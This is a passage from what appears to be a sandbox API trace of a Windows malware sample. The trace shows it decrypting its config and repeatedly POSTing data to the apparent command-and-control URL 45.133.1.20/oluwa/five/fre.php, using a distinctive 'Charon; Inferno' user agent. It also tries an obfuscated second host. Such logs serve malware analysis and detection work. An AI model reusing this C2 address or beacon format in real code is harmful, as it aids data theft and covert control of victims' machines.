dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0200.270] GetProcessHeap () returned 0x6a0000 [0200.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0200.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.271] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0200.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.272] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.273] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.273] GetProcessHeap () returned 0x6a0000 [0200.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0200.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.278] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0200.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.280] CryptDestroyKey (hKey=0x6ad560) returned 1 [0200.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.281] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0200.281] GetProcessHeap () returned 0x6a0000 [0200.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0200.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.284] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0200.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.289] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0200.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.291] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0200.291] GetProcessHeap () returned 0x6a0000 [0200.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0200.291] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0200.291] GetProcessHeap () returned 0x6a0000 [0200.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0200.291] socket (af=2, type=1, protocol=6) returned 0x530 [0200.292] connect (s=0x530, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0200.314] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0200.314] GetProcessHeap () returned 0x6a0000 [0200.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0200.314] GetProcessHeap () returned 0x6a0000 [0200.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0200.315] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.316] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.316] GetProcessHeap () returned 0x6a0000 [0200.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0200.316] GetProcessHeap () returned 0x6a0000 [0200.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.316] GetProcessHeap () returned 0x6a0000 [0200.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0200.316] GetProcessHeap () returned 0x6a0000 [0200.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0200.317] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.318] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.318] GetProcessHeap () returned 0x6a0000 [0200.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0200.318] GetProcessHeap () returned 0x6a0000 [0200.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.318] send (s=0x530, buf=0x6b5c98*, len=242, flags=0) returned 242 [0200.321] send (s=0x530, buf=0x6bb998*, len=159, flags=0) returned 159 [0200.321] GetProcessHeap () returned 0x6a0000 [0200.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0200.321] recv (in: s=0x530, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0200.404] GetProcessHeap () returned 0x6a0000 [0200.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0200.405] GetProcessHeap () returned 0x6a0000 [0200.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0200.406] GetProcessHeap () returned 0x6a0000 [0200.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0200.406] GetProcessHeap () returned 0x6a0000 [0200.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0200.407] closesocket (s=0x530) returned 0 [0200.407] GetProcessHeap () returned 0x6a0000 [0200.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0200.407] GetProcessHeap () returned 0x6a0000 [0200.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.408] GetProcessHeap () returned 0x6a0000 [0200.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0200.408] GetProcessHeap () returned 0x6a0000 [0200.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0200.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9e0) returned 0x530 [0200.431] Sleep (dwMilliseconds=0xea60) [0200.432] GetProcessHeap () returned 0x6a0000 [0200.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0200.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0200.465] GetProcessHeap () returned 0x6a0000 [0200.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0200.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.470] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0200.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.472] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.474] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.474] GetProcessHeap () returned 0x6a0000 [0200.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0200.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.476] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0200.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.482] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0200.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.484] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0200.484] GetProcessHeap () returned 0x6a0000 [0200.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.486] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.488] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.494] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.496] GetProcessHeap () returned 0x6a0000 [0200.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0200.496] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.497] GetProcessHeap () returned 0x6a0000 [0200.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0200.497] GetProcessHeap () returned 0x6a0000 [0200.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.498] GetProcessHeap () returned 0x6a0000 [0200.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0200.498] GetProcessHeap () returned 0x6a0000 [0200.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0200.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.499] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0200.519] GetProcessHeap () returned 0x6a0000 [0200.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0200.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.521] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0200.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.525] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.527] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.527] GetProcessHeap () returned 0x6a0000 [0200.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0200.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.529] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0200.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.531] CryptDestroyKey (hKey=0x6ad020) returned 1 [0200.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.534] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0200.534] GetProcessHeap () returned 0x6a0000 [0200.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.535] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0200.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.536] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0200.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.537] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0200.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.538] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0200.538] GetProcessHeap () returned 0x6a0000 [0200.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0200.538] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0200.538] GetProcessHeap () returned 0x6a0000 [0200.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0200.538] socket (af=2, type=1, protocol=6) returned 0x534 [0200.539] connect (s=0x534, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0200.561] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0200.561] GetProcessHeap () returned 0x6a0000 [0200.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0200.561] GetProcessHeap () returned 0x6a0000 [0200.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0200.561] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.562] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.562] GetProcessHeap () returned 0x6a0000 [0200.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0200.562] GetProcessHeap () returned 0x6a0000 [0200.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.563] GetProcessHeap () returned 0x6a0000 [0200.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0200.563] GetProcessHeap () returned 0x6a0000 [0200.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0200.564] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.565] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.565] GetProcessHeap () returned 0x6a0000 [0200.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0200.565] GetProcessHeap () returned 0x6a0000 [0200.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.566] send (s=0x534, buf=0x6b5c98*, len=242, flags=0) returned 242 [0200.566] send (s=0x534, buf=0x6bb998*, len=159, flags=0) returned 159 [0200.566] GetProcessHeap () returned 0x6a0000 [0200.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0200.566] recv (in: s=0x534, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0200.637] GetProcessHeap () returned 0x6a0000 [0200.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0200.638] GetProcessHeap () returned 0x6a0000 [0200.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0200.638] GetProcessHeap () returned 0x6a0000 [0200.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0200.638] GetProcessHeap () returned 0x6a0000 [0200.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0200.638] closesocket (s=0x534) returned 0 [0200.639] GetProcessHeap () returned 0x6a0000 [0200.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0200.639] GetProcessHeap () returned 0x6a0000 [0200.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.639] GetProcessHeap () returned 0x6a0000 [0200.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0200.640] GetProcessHeap () returned 0x6a0000 [0200.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0200.640] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd94) returned 0x534 [0200.642] Sleep (dwMilliseconds=0xea60) [0200.644] GetProcessHeap () returned 0x6a0000 [0200.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0200.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0200.833] GetProcessHeap () returned 0x6a0000 [0200.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0200.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.834] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0200.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.835] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.836] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.836] GetProcessHeap () returned 0x6a0000 [0200.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0200.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.839] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0200.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.840] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0200.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.841] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0200.841] GetProcessHeap () returned 0x6a0000 [0200.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.842] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.846] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.851] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.852] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.852] GetProcessHeap () returned 0x6a0000 [0200.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0200.853] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.853] GetProcessHeap () returned 0x6a0000 [0200.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0200.854] GetProcessHeap () returned 0x6a0000 [0200.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0200.854] GetProcessHeap () returned 0x6a0000 [0200.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0200.857] GetProcessHeap () returned 0x6a0000 [0200.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0200.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0200.873] GetProcessHeap () returned 0x6a0000 [0200.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0200.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.874] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0200.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.875] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.879] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.879] GetProcessHeap () returned 0x6a0000 [0200.880] HeapFree (in: 